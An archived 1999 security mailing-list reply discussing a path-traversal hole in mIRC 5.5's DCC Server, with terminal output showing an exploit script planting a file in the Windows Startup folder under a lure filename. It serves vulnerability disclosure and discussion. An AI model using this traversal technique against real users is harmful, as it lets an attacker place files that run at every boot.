Re: Mirc 5.5 'DCC Server' hole

From: Liam (redmageat_private)
Date: Mon Feb 01 1999 - 11:01:50 PST

Next message: Tadek Knapik: "NT4 Locking (Was: ole objects in a "secured" environment?)"

Previous message: Patrik Backstrom: "ACC Tigris fix: "public" access without logging in"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I have also tested the balu perl script which was posted, having
results exactly opposite to what Thomas has found.  The only
difference being I havn't tested it on an NT machine, however
there are some important things to consider when using the script.

Sending "C:\autoexec.bat" will not work for two reasons, in the hole
described it was mentioned that mIRC does not filter the '.' or '\'
characters, however this does not mean that it isn't going to
filter the ':" character used to specify a drive.

Although the script claims to send a fake filename breasts.jpg,
if the mIRC victim chooses to maximize the dcc receive window
they will see the following

Filename: breasts.jpg
..\..\..\..\..\autoexec.bat

Which is another reason why you can't specify a drive letter.
C:\WINDOWS>cd ..\..\..\..\E:\download
Invalid directory

Even if we omit the drive letter, there is no guarantee that the
victim has installed mIRC on the C: drive.

Also note, if you attempt to send a file which the person already has
on their hard drive they will be presented with a dialog box
'The file C:\autoexec.bat already exists'
in which they may choose to overwrite, resume, or cancel.
This defeats the purpose of sending a file breasts.jpg to get
the person to accept.

phear:~$./balu foo.bar.org RedMage ./evilfile.txt breasts.jpg
'windows\startm~1\programs\startup\evilfile.txt'
Nick of receiver: RedMage - Resume requested at offset: 0
sending... done.
phear:~$

C:\WINDOWS> dir startm~1\programs\startup\e*.txt

 Volume in drive C is BOOT
 Volume Serial Number is 6396-30DC
 Directory of C:\WINDOWS\Start Menu\Programs\Startup

EVILFI~1 TXT            22  02-01-99  1:53p evilfile.txt
         1 file(s)             22 bytes
         0 dir(s)     246,480,896 bytes free

C:\WINDOWS>


Hence it was successful and evilfile.txt will open each time
the computer is rebooted.

Not only is this successful, but it is successful on both
mIRC 5.5 and mIRC 5.41.  I havn't tested it on any
other versions but earlier versions of mIRC are probably
also vulnerable.

- Liam

>gate:~# ./balu foo.bar.org Nickname ./autoexec.bat breasts.jpg
>"c:\autoexec.bat"
>Nick of receiver: unavailable - Resume requested at offset:
>Broken pipe
>
>Tried many other settings, mirc client under win95, running balu from
another
>host etc. Nothing happens.
>
>Thomas.

Next message: Tadek Knapik: "NT4 Locking (Was: ole objects in a "secured" environment?)"
Previous message: Patrik Backstrom: "ACC Tigris fix: "public" access without logging in"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:32:10 PDT